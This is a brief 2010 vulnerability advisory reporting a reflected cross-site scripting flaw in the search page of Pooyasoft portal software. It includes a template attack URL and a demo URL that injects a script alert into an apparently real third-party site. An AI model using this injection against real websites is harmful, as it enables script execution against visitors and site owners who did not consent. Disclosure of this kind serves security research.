Pooyasoft Cross Site Scripting
Posted on 25 December 2010
########################################################################################## # [+] cross site scripting (XSS) Vulnerability # [+] Portal Name : pooyasoft # [+] software : http://www.pooyasoft.com # [+] Author : d3c0der # [+] Contact : d3c0der@hotmail.com # [+] spt : netqurd - m44r3k - l3l4ck.$c0rpi0n- bl4ckl0rd #[------------------------------------------------------------------------------------] # # [+] Vulnerability # # [+] XSS # # http://www.[site]/search.asp?keywords=[XSS]&Submit1.x=7&Submit1.y=5&searchmode=0 # # #[------------------------------------------------------------------------------------] # [+] Demo # # http://www.dukht.ir/search.asp?keywords=<script>alert("d3c0der")</script>&Submit1.x=7&Submit1.y=5&searchmode=0 #[------------------------------------------------------------------------------------] # th3 EnD ! :d = > d3c0der.blogspot.com ##########################################################################################
